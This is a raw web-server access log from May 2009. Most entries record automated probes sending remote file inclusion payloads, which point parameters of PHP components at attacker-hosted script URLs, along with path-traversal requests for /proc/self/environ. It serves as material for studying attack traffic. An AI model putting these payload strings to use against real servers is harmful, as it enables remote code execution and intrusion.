207.57.79.26 - - [14/May/2009:03:38:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
66.249.67.180 - - [14/May/2009:03:38:52 -0500] "GET /logs/access_log.1150934400 HTTP/1.1" 200 3568 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.160.4.250 - - [14/May/2009:03:42:36 -0500] "GET //db.php?path_local=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 290 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:03:42:36 -0500] "GET /logs//db.php?path_local=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:03:42:36 -0500] "GET /logs/access_log.1239494400//db.php?path_local=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:03:42:41 -0500] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:03:42:41 -0500] "GET /logs/access_log.1237766400//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:03:42:41 -0500] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:03:42:53 -0500] "GET /logs/access_log.1240531200//db.php?path_local=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:03:42:54 -0500] "GET /logs/access_log.1240099200//db.php?path_local=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:03:43:36 -0500] "GET /logs/access_log.1236124800//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:03:44:05 -0500] "GET /logs/access_log.1210809600 HTTP/1.1" 200 14028 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.150.79.146 - - [14/May/2009:03:44:46 -0500] "GET /logs/access_log.1237766400//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:03:44:46 -0500] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:03:44:46 -0500] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:03:45:15 -0500] "GET /logs/home.php?index=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:03:45:15 -0500] "GET /home.php?index=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
218.150.79.146 - - [14/May/2009:03:46:14 -0500] "GET /logs/access_log.1236124800//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:03:48:55 -0500] "GET /logs/home.php?index=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:03:48:55 -0500] "GET /home.php?index=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:03:49:21 -0500] "GET /logs/access_log.1182988800 HTTP/1.1" 200 1928 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.30.156 - - [14/May/2009:03:50:50 -0500] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:03:50:50 -0500] "GET ///components/com_simpleboard/image_upload.php?sbp=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:03:54:42 -0500] "GET /logs/access_log.1188259200 HTTP/1.1" 200 1141 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.155 - - [14/May/2009:03:54:59 -0500] "GET /logs/access_log.1141084800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.234.200.229 - - [14/May/2009:03:55:56 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
200.234.200.229 - - [14/May/2009:03:55:56 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
200.234.200.229 - - [14/May/2009:03:55:56 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 330 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:03:55:56 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 335 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:03:55:56 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:03:55:56 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""XXXXXX"
65.55.106.138 - - [14/May/2009:03:56:29 -0500] "GET /logs/access_log.1148860800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [14/May/2009:03:59:55 -0500] "GET /logs/access_log.1175472000 HTTP/1.1" 200 20094 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.160.4.250 - - [14/May/2009:04:02:09 -0500] "GET ///accesswatch/?sIncPath=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:04:02:10 -0500] "GET /logs/access_log.1235952000///accesswatch/?sIncPath=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:04:02:10 -0500] "GET /logs///accesswatch/?sIncPath=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:04:02:10 -0500] "GET /logs/access_log.1238716800///accesswatch/?sIncPath=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:04:05:13 -0500] "GET /logs/access_log.1186876800 HTTP/1.1" 200 2044 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.232.4.1 - - [14/May/2009:04:08:09 -0500] "GET /logs/global.php?abs_path=http://www.reeftastic.com/cart/media/index/bo.do?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
84.232.4.1 - - [14/May/2009:04:08:10 -0500] "GET /global.php?abs_path=http://www.reeftastic.com/cart/media/index/bo.do?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.55.208.138 - - [14/May/2009:04:09:18 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 200 47926 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [14/May/2009:04:10:32 -0500] "GET /logs/access_log.1157155200 HTTP/1.1" 200 2760 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.29.93.130 - - [14/May/2009:04:15:24 -0500] "GET /global.php?abs_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.29.93.130 - - [14/May/2009:04:15:24 -0500] "GET /logs/global.php?abs_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.249.67.180 - - [14/May/2009:04:15:47 -0500] "GET /logs/access_log.1154476800 HTTP/1.1" 200 3758 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.237.201 - - [14/May/2009:04:17:00 -0500] "GET /logs/global.php?abs_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
85.17.237.201 - - [14/May/2009:04:17:00 -0500] "GET /global.php?abs_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 293 "-""libwww-perl/5.826"
69.94.30.156 - - [14/May/2009:04:17:05 -0500] "GET /logs//////////?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189330 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:04:17:05 -0500] "GET //////////?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3253 "-""libwww-perl/5.805"
64.22.100.83 - - [14/May/2009:04:20:48 -0500] "GET /logs/global.php?abs_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
64.22.100.83 - - [14/May/2009:04:20:48 -0500] "GET /global.php?abs_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
66.249.67.180 - - [14/May/2009:04:21:07 -0500] "GET /logs/access_log.1115078400 HTTP/1.1" 200 972 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.77.54 - - [14/May/2009:04:21:49 -0500] "GET /logs/global.php?abs_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.56.77.54 - - [14/May/2009:04:21:49 -0500] "GET /global.php?abs_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:04:25:53 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:04:25:53 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:04:26:22 -0500] "GET /logs/access_log.1209945600 HTTP/1.1" 200 748 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.227.156.113 - - [14/May/2009:04:27:48 -0500] "GET /logs/access_log.1239321600/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.227.156.113 - - [14/May/2009:04:27:48 -0500] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.156.113 - - [14/May/2009:04:27:48 -0500] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:04:28:04 -0500] "GET /logs//reflect/spaw_control.config.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:04:28:04 -0500] "GET //reflect/spaw_control.config.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
67.227.156.113 - - [14/May/2009:04:28:20 -0500] "GET /logs/access_log.1239926400/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:04:28:50 -0500] "GET /logs//reflect/spaw_control.config.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:04:28:51 -0500] "GET //reflect/spaw_control.config.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
212.150.52.114 - - [14/May/2009:04:29:15 -0500] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:29:15 -0500] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:29:15 -0500] "GET /logs/access_log.1239321600/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:29:34 -0500] "GET /logs/access_log.1239321600/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:29:34 -0500] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:29:34 -0500] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:30:08 -0500] "GET /logs/access_log.1239926400/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:04:31:23 -0500] "GET /logs/access_log.1239926400/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:04:31:38 -0500] "GET /logs/access_log.1144627200 HTTP/1.1" 200 718 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.5.168.93 - - [14/May/2009:04:33:02 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sherif.do.am/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:04:33:02 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sherif.do.am/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.825"
121.173.130.41 - - [14/May/2009:04:36:50 -0500] "GET /send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:04:36:50 -0500] "GET /logs/send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:04:36:50 -0500] "GET /logs/access_log.1238371200/send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:04:36:50 -0500] "GET /logs/access_log.1236988800/send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:04:36:56 -0500] "GET /logs/send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:04:36:56 -0500] "GET /logs/access_log.1236988800/send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:04:36:56 -0500] "GET /send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:04:36:56 -0500] "GET /logs/access_log.1238371200/send_queued_emails.php?root_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:04:36:59 -0500] "GET /logs/access_log.1173052800 HTTP/1.1" 200 3471 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [14/May/2009:04:42:12 -0500] "GET /logs/access_log.1203638400 HTTP/1.1" 200 21280 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.1.64.133 - - [14/May/2009:04:44:03 -0500] "GET /logs/index.php?conteudo=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.1.64.133 - - [14/May/2009:04:44:04 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
218.1.64.133 - - [14/May/2009:04:44:05 -0500] "GET /logs/index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:04:44:06 -0500] "GET /logs/index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:04:45:04 -0500] "GET /index.php?conteudo=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.1.64.133 - - [14/May/2009:04:45:05 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
218.1.64.133 - - [14/May/2009:04:45:05 -0500] "GET /index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:04:45:06 -0500] "GET /index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""XXXXXX"
66.249.67.180 - - [14/May/2009:04:47:33 -0500] "GET /logs/access_log.1199923200 HTTP/1.1" 200 926 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.178.197.14 - - [14/May/2009:04:48:04 -0500] "GET //reflect/spaw_control.config.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
87.242.75.202 - - [14/May/2009:04:48:21 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 319 "-""XXXXXX"
87.242.75.202 - - [14/May/2009:04:48:21 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 324 "-""XXXXXX"
87.242.75.202 - - [14/May/2009:04:48:22 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""XXXXXX"
87.242.75.202 - - [14/May/2009:04:48:22 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""XXXXXX"
209.175.180.194 - - [14/May/2009:04:48:45 -0500] "GET //skysilver/login.tpl.php?theme=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
209.175.180.194 - - [14/May/2009:04:48:45 -0500] "GET /logs//skysilver/login.tpl.php?theme=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.150.79.146 - - [14/May/2009:04:49:28 -0500] "GET /'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:28 -0500] "GET /logs/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:28 -0500] "GET /logs/access_log.1235347200/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:35 -0500] "GET /logs/access_log.1231977600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:35 -0500] "GET /logs/access_log.1233878400/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:40 -0500] "GET /logs/access_log.1232668800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:40 -0500] "GET /logs/access_log.1227657600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:40 -0500] "GET /logs/access_log.1232236800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:47 -0500] "GET /logs/access_log.1235865600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:04:49:55 -0500] "GET /logs/access_log.1235520000///skin/zero_vote/setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:04:49:55 -0500] "GET ///skin/zero_vote/setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:04:49:55 -0500] "GET /logs///skin/zero_vote/setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:56 -0500] "GET /logs/access_log.1233705600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:56 -0500] "GET /logs/access_log.1236643200/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:56 -0500] "GET /logs/access_log.1234915200/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:56 -0500] "GET /logs/access_log.1236556800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:49:56 -0500] "GET /logs/access_log.1229990400/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:06 -0500] "GET /logs/access_log.1235260800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:06 -0500] "GET /logs/access_log.1231891200/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:12 -0500] "GET /logs/access_log.1228348800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:12 -0500] "GET /logs/access_log.1227744000/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:18 -0500] "GET /logs/access_log.1233014400/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:25 -0500] "GET /logs/access_log.1233273600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:25 -0500] "GET /logs/access_log.1236038400/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:43 -0500] "GET /logs/access_log.1235433600/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:43 -0500] "GET /logs/access_log.1229904000/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:48 -0500] "GET /logs/access_log.1233100800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:54 -0500] "GET /logs/access_log.1231804800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:50:54 -0500] "GET /logs/access_log.1231718400/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:51:00 -0500] "GET /logs/access_log.1228608000/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:51:00 -0500] "GET /logs/access_log.1235088000/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:51:00 -0500] "GET /logs/access_log.1226620800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:04:51:00 -0500] "GET /logs/access_log.1239580800/'/modules/vwar/admin/admin.php?vwar_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
